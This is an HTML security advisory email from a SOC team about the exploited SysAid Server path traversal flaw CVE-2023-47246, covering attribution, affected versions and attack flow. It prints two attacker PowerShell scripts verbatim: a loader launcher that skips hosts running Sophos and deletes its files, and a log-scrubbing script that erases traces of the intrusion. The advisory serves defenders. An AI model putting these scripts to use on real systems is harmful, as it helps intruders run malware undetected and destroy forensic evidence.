<html xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:w="urn:schemas-microsoft-com:office:word" xmlns:m="http://schemas.microsoft.com/office/2004/12/omml" xmlns="http://www.w3.org/TR/REC-html40">
<head>
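<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<!-- Charset corrected from us-ascii: the body text contains non-ASCII characters
     (the curly quotes around "Lace Tempest" in the History paragraph), which
     us-ascii cannot represent, so a strict client honoring the declared charset
     would mis-decode them. The generator tag below is kept as-is for provenance. -->
<meta name="Generator" content="Microsoft Word 15 (filtered medium)">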
<!--[if !mso]><style>v\:* {behavior:url(#default#VML);}
o\:* {behavior:url(#default#VML);}
w\:* {behavior:url(#default#VML);}
.shape {behavior:url(#default#VML);}
</style><![endif]--><style><!--
/* Font Definitions */
@font-face
        {font-family:Wingdings;
        panose-1:5 0 0 0 0 0 0 0 0 0;}
@font-face
        {font-family:"Cambria Math";
        panose-1:2 4 5 3 5 4 6 3 2 4;}
@font-face
        {font-family:Calibri;
        panose-1:2 15 5 2 2 2 4 3 2 4;}
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
        {margin:0in;
        font-size:11.0pt;
        font-family:"Calibri",sans-serif;
        mso-ligatures:standardcontextual;}
a:link, span.MsoHyperlink
        {mso-style-priority:99;
        color:#0563C1;
        text-decoration:underline;}
p.MsoListParagraph, li.MsoListParagraph, div.MsoListParagraph
        {mso-style-priority:34;
        margin-top:0in;
        margin-right:0in;
        margin-bottom:0in;
        margin-left:.5in;
        font-size:11.0pt;
        font-family:"Calibri",sans-serif;
        mso-ligatures:standardcontextual;}
span.EmailStyle17
        {mso-style-type:personal-compose;
        font-family:"Calibri",sans-serif;
        color:windowtext;}
.MsoChpDefault
        {mso-style-type:export-only;
        font-family:"Calibri",sans-serif;}
@page WordSection1
        {size:8.5in 11.0in;
        margin:1.0in 1.0in 1.0in 1.0in;}
div.WordSection1
        {page:WordSection1;}
/* List Definitions */
@list l0
        {mso-list-id:440682668;
        mso-list-type:hybrid;
        mso-list-template-ids:-1321561300 67698689 67698691 67698693 67698689 67698691 67698693 67698689 67698691 67698693;}
@list l0:level1
        {mso-level-number-format:bullet;
        mso-level-text:\F0B7;
        mso-level-tab-stop:none;
        mso-level-number-position:left;
        text-indent:-.25in;
        font-family:Symbol;}
@list l0:level2
        {mso-level-number-format:bullet;
        mso-level-text:o;
        mso-level-tab-stop:none;
        mso-level-number-position:left;
        text-indent:-.25in;
        font-family:"Courier New";}
@list l0:level3
        {mso-level-number-format:bullet;
        mso-level-text:\F0A7;
        mso-level-tab-stop:none;
        mso-level-number-position:left;
        text-indent:-.25in;
        font-family:Wingdings;}
@list l0:level4
        {mso-level-number-format:bullet;
        mso-level-text:\F0B7;
        mso-level-tab-stop:none;
        mso-level-number-position:left;
        text-indent:-.25in;
        font-family:Symbol;}
@list l0:level5
        {mso-level-number-format:bullet;
        mso-level-text:o;
        mso-level-tab-stop:none;
        mso-level-number-position:left;
        text-indent:-.25in;
        font-family:"Courier New";}
@list l0:level6
        {mso-level-number-format:bullet;
        mso-level-text:\F0A7;
        mso-level-tab-stop:none;
        mso-level-number-position:left;
        text-indent:-.25in;
        font-family:Wingdings;}
@list l0:level7
        {mso-level-number-format:bullet;
        mso-level-text:\F0B7;
        mso-level-tab-stop:none;
        mso-level-number-position:left;
        text-indent:-.25in;
        font-family:Symbol;}
@list l0:level8
        {mso-level-number-format:bullet;
        mso-level-text:o;
        mso-level-tab-stop:none;
        mso-level-number-position:left;
        text-indent:-.25in;
        font-family:"Courier New";}
@list l0:level9
        {mso-level-number-format:bullet;
        mso-level-text:\F0A7;
        mso-level-tab-stop:none;
        mso-level-number-position:left;
        text-indent:-.25in;
        font-family:Wingdings;}
@list l1
        {mso-list-id:535898869;
        mso-list-template-ids:1427391786;}
@list l1:level1
        {mso-level-number-format:bullet;
        mso-level-text:\F0B7;
        mso-level-tab-stop:.5in;
        mso-level-number-position:left;
        text-indent:-.25in;
        mso-ansi-font-size:10.0pt;
        font-family:Symbol;}
@list l1:level2
        {mso-level-number-format:bullet;
        mso-level-text:o;
        mso-level-tab-stop:1.0in;
        mso-level-number-position:left;
        text-indent:-.25in;
        mso-ansi-font-size:10.0pt;
        font-family:"Courier New";
        mso-bidi-font-family:"Times New Roman";}
@list l1:level3
        {mso-level-number-format:bullet;
        mso-level-text:\F0A7;
        mso-level-tab-stop:1.5in;
        mso-level-number-position:left;
        text-indent:-.25in;
        mso-ansi-font-size:10.0pt;
        font-family:Wingdings;}
@list l1:level4
        {mso-level-number-format:bullet;
        mso-level-text:\F0A7;
        mso-level-tab-stop:2.0in;
        mso-level-number-position:left;
        text-indent:-.25in;
        mso-ansi-font-size:10.0pt;
        font-family:Wingdings;}
@list l1:level5
        {mso-level-number-format:bullet;
        mso-level-text:\F0A7;
        mso-level-tab-stop:2.5in;
        mso-level-number-position:left;
        text-indent:-.25in;
        mso-ansi-font-size:10.0pt;
        font-family:Wingdings;}
@list l1:level6
        {mso-level-number-format:bullet;
        mso-level-text:\F0A7;
        mso-level-tab-stop:3.0in;
        mso-level-number-position:left;
        text-indent:-.25in;
        mso-ansi-font-size:10.0pt;
        font-family:Wingdings;}
@list l1:level7
        {mso-level-number-format:bullet;
        mso-level-text:\F0A7;
        mso-level-tab-stop:3.5in;
        mso-level-number-position:left;
        text-indent:-.25in;
        mso-ansi-font-size:10.0pt;
        font-family:Wingdings;}
@list l1:level8
        {mso-level-number-format:bullet;
        mso-level-text:\F0A7;
        mso-level-tab-stop:4.0in;
        mso-level-number-position:left;
        text-indent:-.25in;
        mso-ansi-font-size:10.0pt;
        font-family:Wingdings;}
@list l1:level9
        {mso-level-number-format:bullet;
        mso-level-text:\F0A7;
        mso-level-tab-stop:4.5in;
        mso-level-number-position:left;
        text-indent:-.25in;
        mso-ansi-font-size:10.0pt;
        font-family:Wingdings;}
@list l2
        {mso-list-id:1149785349;
        mso-list-type:hybrid;
        mso-list-template-ids:135152490 67698689 67698691 67698693 67698689 67698691 67698693 67698689 67698691 67698693;}
@list l2:level1
        {mso-level-number-format:bullet;
        mso-level-text:\F0B7;
        mso-level-tab-stop:none;
        mso-level-number-position:left;
        text-indent:-.25in;
        font-family:Symbol;}
@list l2:level2
        {mso-level-number-format:bullet;
        mso-level-text:o;
        mso-level-tab-stop:none;
        mso-level-number-position:left;
        text-indent:-.25in;
        font-family:"Courier New";}
@list l2:level3
        {mso-level-number-format:bullet;
        mso-level-text:\F0A7;
        mso-level-tab-stop:none;
        mso-level-number-position:left;
        text-indent:-.25in;
        font-family:Wingdings;}
@list l2:level4
        {mso-level-number-format:bullet;
        mso-level-text:\F0B7;
        mso-level-tab-stop:none;
        mso-level-number-position:left;
        text-indent:-.25in;
        font-family:Symbol;}
@list l2:level5
        {mso-level-number-format:bullet;
        mso-level-text:o;
        mso-level-tab-stop:none;
        mso-level-number-position:left;
        text-indent:-.25in;
        font-family:"Courier New";}
@list l2:level6
        {mso-level-number-format:bullet;
        mso-level-text:\F0A7;
        mso-level-tab-stop:none;
        mso-level-number-position:left;
        text-indent:-.25in;
        font-family:Wingdings;}
@list l2:level7
        {mso-level-number-format:bullet;
        mso-level-text:\F0B7;
        mso-level-tab-stop:none;
        mso-level-number-position:left;
        text-indent:-.25in;
        font-family:Symbol;}
@list l2:level8
        {mso-level-number-format:bullet;
        mso-level-text:o;
        mso-level-tab-stop:none;
        mso-level-number-position:left;
        text-indent:-.25in;
        font-family:"Courier New";}
@list l2:level9
        {mso-level-number-format:bullet;
        mso-level-text:\F0A7;
        mso-level-tab-stop:none;
        mso-level-number-position:left;
        text-indent:-.25in;
        font-family:Wingdings;}
@list l3
        {mso-list-id:1270888898;
        mso-list-type:hybrid;
        mso-list-template-ids:-2032382722 67698689 67698691 67698693 67698689 67698691 67698693 67698689 67698691 67698693;}
@list l3:level1
        {mso-level-number-format:bullet;
        mso-level-text:\F0B7;
        mso-level-tab-stop:none;
        mso-level-number-position:left;
        text-indent:-.25in;
        font-family:Symbol;}
@list l3:level2
        {mso-level-number-format:bullet;
        mso-level-text:o;
        mso-level-tab-stop:none;
        mso-level-number-position:left;
        text-indent:-.25in;
        font-family:"Courier New";}
@list l3:level3
        {mso-level-number-format:bullet;
        mso-level-text:\F0A7;
        mso-level-tab-stop:none;
        mso-level-number-position:left;
        text-indent:-.25in;
        font-family:Wingdings;}
@list l3:level4
        {mso-level-number-format:bullet;
        mso-level-text:\F0B7;
        mso-level-tab-stop:none;
        mso-level-number-position:left;
        text-indent:-.25in;
        font-family:Symbol;}
@list l3:level5
        {mso-level-number-format:bullet;
        mso-level-text:o;
        mso-level-tab-stop:none;
        mso-level-number-position:left;
        text-indent:-.25in;
        font-family:"Courier New";}
@list l3:level6
        {mso-level-number-format:bullet;
        mso-level-text:\F0A7;
        mso-level-tab-stop:none;
        mso-level-number-position:left;
        text-indent:-.25in;
        font-family:Wingdings;}
@list l3:level7
        {mso-level-number-format:bullet;
        mso-level-text:\F0B7;
        mso-level-tab-stop:none;
        mso-level-number-position:left;
        text-indent:-.25in;
        font-family:Symbol;}
@list l3:level8
        {mso-level-number-format:bullet;
        mso-level-text:o;
        mso-level-tab-stop:none;
        mso-level-number-position:left;
        text-indent:-.25in;
        font-family:"Courier New";}
@list l3:level9
        {mso-level-number-format:bullet;
        mso-level-text:\F0A7;
        mso-level-tab-stop:none;
        mso-level-number-position:left;
        text-indent:-.25in;
        font-family:Wingdings;}
@list l4
        {mso-list-id:1496217853;
        mso-list-type:hybrid;
        mso-list-template-ids:1152963076 67698689 67698691 67698693 67698689 67698691 67698693 67698689 67698691 67698693;}
@list l4:level1
        {mso-level-number-format:bullet;
        mso-level-text:\F0B7;
        mso-level-tab-stop:none;
        mso-level-number-position:left;
        text-indent:-.25in;
        font-family:Symbol;}
@list l4:level2
        {mso-level-number-format:bullet;
        mso-level-text:o;
        mso-level-tab-stop:none;
        mso-level-number-position:left;
        text-indent:-.25in;
        font-family:"Courier New";}
@list l4:level3
        {mso-level-number-format:bullet;
        mso-level-text:\F0A7;
        mso-level-tab-stop:none;
        mso-level-number-position:left;
        text-indent:-.25in;
        font-family:Wingdings;}
@list l4:level4
        {mso-level-number-format:bullet;
        mso-level-text:\F0B7;
        mso-level-tab-stop:none;
        mso-level-number-position:left;
        text-indent:-.25in;
        font-family:Symbol;}
@list l4:level5
        {mso-level-number-format:bullet;
        mso-level-text:o;
        mso-level-tab-stop:none;
        mso-level-number-position:left;
        text-indent:-.25in;
        font-family:"Courier New";}
@list l4:level6
        {mso-level-number-format:bullet;
        mso-level-text:\F0A7;
        mso-level-tab-stop:none;
        mso-level-number-position:left;
        text-indent:-.25in;
        font-family:Wingdings;}
@list l4:level7
        {mso-level-number-format:bullet;
        mso-level-text:\F0B7;
        mso-level-tab-stop:none;
        mso-level-number-position:left;
        text-indent:-.25in;
        font-family:Symbol;}
@list l4:level8
        {mso-level-number-format:bullet;
        mso-level-text:o;
        mso-level-tab-stop:none;
        mso-level-number-position:left;
        text-indent:-.25in;
        font-family:"Courier New";}
@list l4:level9
        {mso-level-number-format:bullet;
        mso-level-text:\F0A7;
        mso-level-tab-stop:none;
        mso-level-number-position:left;
        text-indent:-.25in;
        font-family:Wingdings;}
@list l5
        {mso-list-id:1502815530;
        mso-list-template-ids:-905037508;}
@list l5:level1
        {mso-level-number-format:bullet;
        mso-level-text:\F0B7;
        mso-level-tab-stop:.5in;
        mso-level-number-position:left;
        text-indent:-.25in;
        mso-ansi-font-size:10.0pt;
        font-family:Symbol;}
@list l5:level2
        {mso-level-number-format:bullet;
        mso-level-text:o;
        mso-level-tab-stop:1.0in;
        mso-level-number-position:left;
        text-indent:-.25in;
        mso-ansi-font-size:10.0pt;
        font-family:"Courier New";
        mso-bidi-font-family:"Times New Roman";}
@list l5:level3
        {mso-level-number-format:bullet;
        mso-level-text:\F0A7;
        mso-level-tab-stop:1.5in;
        mso-level-number-position:left;
        text-indent:-.25in;
        mso-ansi-font-size:10.0pt;
        font-family:Wingdings;}
@list l5:level4
        {mso-level-number-format:bullet;
        mso-level-text:\F0A7;
        mso-level-tab-stop:2.0in;
        mso-level-number-position:left;
        text-indent:-.25in;
        mso-ansi-font-size:10.0pt;
        font-family:Wingdings;}
@list l5:level5
        {mso-level-number-format:bullet;
        mso-level-text:\F0A7;
        mso-level-tab-stop:2.5in;
        mso-level-number-position:left;
        text-indent:-.25in;
        mso-ansi-font-size:10.0pt;
        font-family:Wingdings;}
@list l5:level6
        {mso-level-number-format:bullet;
        mso-level-text:\F0A7;
        mso-level-tab-stop:3.0in;
        mso-level-number-position:left;
        text-indent:-.25in;
        mso-ansi-font-size:10.0pt;
        font-family:Wingdings;}
@list l5:level7
        {mso-level-number-format:bullet;
        mso-level-text:\F0A7;
        mso-level-tab-stop:3.5in;
        mso-level-number-position:left;
        text-indent:-.25in;
        mso-ansi-font-size:10.0pt;
        font-family:Wingdings;}
@list l5:level8
        {mso-level-number-format:bullet;
        mso-level-text:\F0A7;
        mso-level-tab-stop:4.0in;
        mso-level-number-position:left;
        text-indent:-.25in;
        mso-ansi-font-size:10.0pt;
        font-family:Wingdings;}
@list l5:level9
        {mso-level-number-format:bullet;
        mso-level-text:\F0A7;
        mso-level-tab-stop:4.5in;
        mso-level-number-position:left;
        text-indent:-.25in;
        mso-ansi-font-size:10.0pt;
        font-family:Wingdings;}
@list l6
        {mso-list-id:1573730714;
        mso-list-type:hybrid;
        mso-list-template-ids:56755152 67698689 67698691 67698693 67698689 67698691 67698693 67698689 67698691 67698693;}
@list l6:level1
        {mso-level-number-format:bullet;
        mso-level-text:\F0B7;
        mso-level-tab-stop:none;
        mso-level-number-position:left;
        text-indent:-.25in;
        font-family:Symbol;}
@list l6:level2
        {mso-level-number-format:bullet;
        mso-level-text:o;
        mso-level-tab-stop:none;
        mso-level-number-position:left;
        text-indent:-.25in;
        font-family:"Courier New";}
@list l6:level3
        {mso-level-number-format:bullet;
        mso-level-text:\F0A7;
        mso-level-tab-stop:none;
        mso-level-number-position:left;
        text-indent:-.25in;
        font-family:Wingdings;}
@list l6:level4
        {mso-level-number-format:bullet;
        mso-level-text:\F0B7;
        mso-level-tab-stop:none;
        mso-level-number-position:left;
        text-indent:-.25in;
        font-family:Symbol;}
@list l6:level5
        {mso-level-number-format:bullet;
        mso-level-text:o;
        mso-level-tab-stop:none;
        mso-level-number-position:left;
        text-indent:-.25in;
        font-family:"Courier New";}
@list l6:level6
        {mso-level-number-format:bullet;
        mso-level-text:\F0A7;
        mso-level-tab-stop:none;
        mso-level-number-position:left;
        text-indent:-.25in;
        font-family:Wingdings;}
@list l6:level7
        {mso-level-number-format:bullet;
        mso-level-text:\F0B7;
        mso-level-tab-stop:none;
        mso-level-number-position:left;
        text-indent:-.25in;
        font-family:Symbol;}
@list l6:level8
        {mso-level-number-format:bullet;
        mso-level-text:o;
        mso-level-tab-stop:none;
        mso-level-number-position:left;
        text-indent:-.25in;
        font-family:"Courier New";}
@list l6:level9
        {mso-level-number-format:bullet;
        mso-level-text:\F0A7;
        mso-level-tab-stop:none;
        mso-level-number-position:left;
        text-indent:-.25in;
        font-family:Wingdings;}
@list l7
        {mso-list-id:2128043870;
        mso-list-template-ids:-1425641224;}
@list l7:level1
        {mso-level-number-format:bullet;
        mso-level-text:\F0B7;
        mso-level-tab-stop:.5in;
        mso-level-number-position:left;
        text-indent:-.25in;
        mso-ansi-font-size:10.0pt;
        font-family:Symbol;}
@list l7:level2
        {mso-level-number-format:bullet;
        mso-level-text:o;
        mso-level-tab-stop:1.0in;
        mso-level-number-position:left;
        text-indent:-.25in;
        mso-ansi-font-size:10.0pt;
        font-family:"Courier New";
        mso-bidi-font-family:"Times New Roman";}
@list l7:level3
        {mso-level-number-format:bullet;
        mso-level-text:\F0A7;
        mso-level-tab-stop:1.5in;
        mso-level-number-position:left;
        text-indent:-.25in;
        mso-ansi-font-size:10.0pt;
        font-family:Wingdings;}
@list l7:level4
        {mso-level-number-format:bullet;
        mso-level-text:\F0A7;
        mso-level-tab-stop:2.0in;
        mso-level-number-position:left;
        text-indent:-.25in;
        mso-ansi-font-size:10.0pt;
        font-family:Wingdings;}
@list l7:level5
        {mso-level-number-format:bullet;
        mso-level-text:\F0A7;
        mso-level-tab-stop:2.5in;
        mso-level-number-position:left;
        text-indent:-.25in;
        mso-ansi-font-size:10.0pt;
        font-family:Wingdings;}
@list l7:level6
        {mso-level-number-format:bullet;
        mso-level-text:\F0A7;
        mso-level-tab-stop:3.0in;
        mso-level-number-position:left;
        text-indent:-.25in;
        mso-ansi-font-size:10.0pt;
        font-family:Wingdings;}
@list l7:level7
        {mso-level-number-format:bullet;
        mso-level-text:\F0A7;
        mso-level-tab-stop:3.5in;
        mso-level-number-position:left;
        text-indent:-.25in;
        mso-ansi-font-size:10.0pt;
        font-family:Wingdings;}
@list l7:level8
        {mso-level-number-format:bullet;
        mso-level-text:\F0A7;
        mso-level-tab-stop:4.0in;
        mso-level-number-position:left;
        text-indent:-.25in;
        mso-ansi-font-size:10.0pt;
        font-family:Wingdings;}
@list l7:level9
        {mso-level-number-format:bullet;
        mso-level-text:\F0A7;
        mso-level-tab-stop:4.5in;
        mso-level-number-position:left;
        text-indent:-.25in;
        mso-ansi-font-size:10.0pt;
        font-family:Wingdings;}
ol
        {margin-bottom:0in;}
ul
        {margin-bottom:0in;}
--></style><!--[if gte mso 9]><xml>
<o:shapedefaults v:ext="edit" spidmax="1026" />
</xml><![endif]--><!--[if gte mso 9]><xml>
<o:shapelayout v:ext="edit">
<o:idmap v:ext="edit" data="1" />
</o:shapelayout></xml><![endif]-->
</head>
<body lang="EN-US" link="#0563C1" vlink="#954F72" style="word-wrap:break-word">
<div class="WordSection1">
<p class="MsoNormal"><a name="_Hlk122600425">Good morning,<span style="mso-ligatures:none"><o:p></o:p></span></a></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"> <o:p></o:p></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425">The SOC Services team is reporting on the vulnerability:</span><span style="mso-bookmark:_Hlk122600425"><span style="font-family:"Arial",sans-serif;mso-ligatures:none">
</span><b>CVE-2023-47246 SysAid Server Path Traversal Vulnerability</b>. Due to its high visibility and the known presence of this software in the state environment, we are providing this in-depth information:<o:p></o:p></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"> <o:p></o:p></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><b><u>History</u></b>: On November 8, 2023, SysAid published an advisory stating that their on-premise server software had a previously undisclosed vulnerability and that they were aware of in-the-wild
 exploitation. Days prior, Microsoft had notified SysAid of this issue and attributed these compromises to TA505 (“Lace Tempest”), the group commonly known as the cl0p ransomware gang. On November 13, 2023, CISA added CVE-2023-47246 to the Known Exploited Vulnerabilities
 Catalog.<o:p></o:p></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><span style="background:yellow;mso-highlight:yellow"><o:p> </o:p></span></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425">The following products are affected:<o:p></o:p></span></p>
<ul style="margin-top:0in" type="disc">
<li class="MsoListParagraph" style="margin-left:0in;mso-list:l2 level1 lfo6"><span style="mso-bookmark:_Hlk122600425">SysAid Server prior to 23.3.36<o:p></o:p></span></li></ul>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425">Fixed version:<o:p></o:p></span></p>
<ul style="margin-top:0in" type="disc">
<li class="MsoListParagraph" style="margin-left:0in;mso-list:l2 level1 lfo6"><span style="mso-bookmark:_Hlk122600425">SysAid Server 23.3.36<o:p></o:p></span></li></ul>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><o:p> </o:p></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425">SysAid has provided an advisory which can be found here:
</span><a href="https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification"><span style="mso-bookmark:_Hlk122600425">https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification</span><span style="mso-bookmark:_Hlk122600425"></span></a><span style="mso-bookmark:_Hlk122600425"><o:p></o:p></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><span style="background:yellow;mso-highlight:yellow"><o:p> </o:p></span></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><b><u>Intelligence</u></b>: As of November 8, 2023, the vulnerability has been confirmed as being exploited in the wild.<o:p></o:p></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><b><u><span style="background:yellow;mso-highlight:yellow"><o:p><span style="text-decoration:none"> </span></o:p></span></u></b></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><b><u>Workarounds:</u></b> There are no workarounds at this time.<span style="background:yellow;mso-highlight:yellow"><o:p></o:p></span></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><b><u><o:p><span style="text-decoration:none"> </span></o:p></u></b></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><b><u>How it works</u></b>: The attacker exploits the path traversal vulnerability to upload a WAR archive containing a WebShell and other payloads into the webroot of the SysAid Tomcat web service. The attacker then uses a PowerShell script
 to deploy the WebShell, which executes a malware loader named <i>user.exe</i>; the loader loads the GraceWire trojan and injects it into one of the processes listed below:<o:p></o:p></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><o:p> </o:p></span></p>
<ul style="margin-top:0in" type="disc">
<li class="MsoListParagraph" style="margin-left:0in;mso-list:l2 level1 lfo6"><span style="mso-bookmark:_Hlk122600425">Spoolsv.exe<o:p></o:p></span></li><li class="MsoListParagraph" style="margin-left:0in;mso-list:l2 level1 lfo6"><span style="mso-bookmark:_Hlk122600425">msiexec.exe<o:p></o:p></span></li><li class="MsoListParagraph" style="margin-left:0in;mso-list:l2 level1 lfo6"><span style="mso-bookmark:_Hlk122600425">svchost.exe<o:p></o:p></span></li></ul>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><o:p> </o:p></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425">After initial access, the attackers used a second PowerShell script to erase evidence of their actions from disk and from the SysAid on-prem server web logs.<o:p></o:p></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><o:p> </o:p></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425">The following PowerShell script was used to launch the user.exe loader:<o:p></o:p></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>$wapps='C:\Program Files\SysAidServer\tomcat\webapps'<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>dir "$wapps\usersfiles"<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>$bp=0<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>foreach($s in tasklist) {<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>  if ($s -match '^(Sophos).*\.exe\s') {echo $s; $bp++;}<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>}<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>if ($bp) { echo "`nSTOP-PROCs FOUND! Exiting`n" }<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>else {<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>  echo "Starting user.exe"<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>& "$wapps\usersfiles\user.exe"
<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>}<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>Start-Sleep 1<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>Remove-Item -Force "$wapps\usersfiles.war"<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>Remove-Item -Force "$wapps\usersfiles\user.*"<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>exi<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><span style="background:yellow;mso-highlight:yellow"><o:p> </o:p></span></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425">The script performs the following actions:<o:p></o:p></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><o:p> </o:p></span></p>
<ul style="margin-top:0in" type="disc">
<li class="MsoListParagraph" style="margin-left:0in;mso-list:l3 level1 lfo7"><span style="mso-bookmark:_Hlk122600425">Lists all files placed in the C:\Program Files\SysAidServer\tomcat\webapps\usersfiles directory.<o:p></o:p></span></li><li class="MsoListParagraph" style="margin-left:0in;mso-list:l3 level1 lfo7"><span style="mso-bookmark:_Hlk122600425">Checks all running processes for any process whose name begins with “Sophos” and, if one is found, exits without launching the payload.<o:p></o:p></span></li><li class="MsoListParagraph" style="margin-left:0in;mso-list:l3 level1 lfo7"><span style="mso-bookmark:_Hlk122600425">If no matching processes are found, starts the user.exe malware.<o:p></o:p></span></li><li class="MsoListParagraph" style="margin-left:0in;mso-list:l3 level1 lfo7"><span style="mso-bookmark:_Hlk122600425">Pauses for one second, then removes the files used during the attack, including the usersfiles.war file and any files matching C:\Program
 Files\SysAidServer\tomcat\webapps\usersfiles\user.*<o:p></o:p></span></li></ul>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><o:p> </o:p></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425">The following PowerShell script was used to erase evidence:<o:p></o:p></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>$tomcat_dir = "E:\SysAidServer\tomcat";<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>$log4j_dir = "E:\SysAidServer\root\WEB-INF\logs";<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>$log4jPattern = "userentry|getLogo\.jsp|Got\ LDAP\ file|ldapSyms|usersfile|time=18686488731";<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>$tcPattern = "userentry|getLogo\.jsp|Got\ LDAP\ file|ldapSyms|usersfile|time=18686488731";<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i><o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>function cleanLL {<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>$fl = Get-ChildItem "$log4j_dir";<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>for ($i=0; $i -lt $fl.Count; $i++) {<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>     $logFile = $fl[$i].FullName;<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>     if (Select-String -Pattern "$log4jPattern" -Path "$logFile") {<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>         Get-Content -Path "$logFile" | Select-String -Pattern "$log4jPattern" -NotMatch | Set-Content -Path "$logFile.bck";<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>         cp "$logFile.bck" "$logFile"<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>     }<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>}<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>$fl = Get-ChildItem "$tomcat_dir\logs\";<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>for ($i=0; $i -lt $fl.Count; $i++) {<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>     $logFile = $fl[$i].FullName;<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>     if (Select-String -Pattern "$tcPattern" -Path "$logFile") {<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>         Get-Content -Path "$logFile" | Select-String -Pattern "$tcPattern" -NotMatch | Set-Content -Path "$logFile.bck";<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>         cp "$logFile.bck" "$logFile"<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>     }<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>}<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>}<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i><o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>sleep 5;<o:p></o:p></i></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_Hlk122600425"><i>cleanLL;<o:p></o:p></i></span></p>
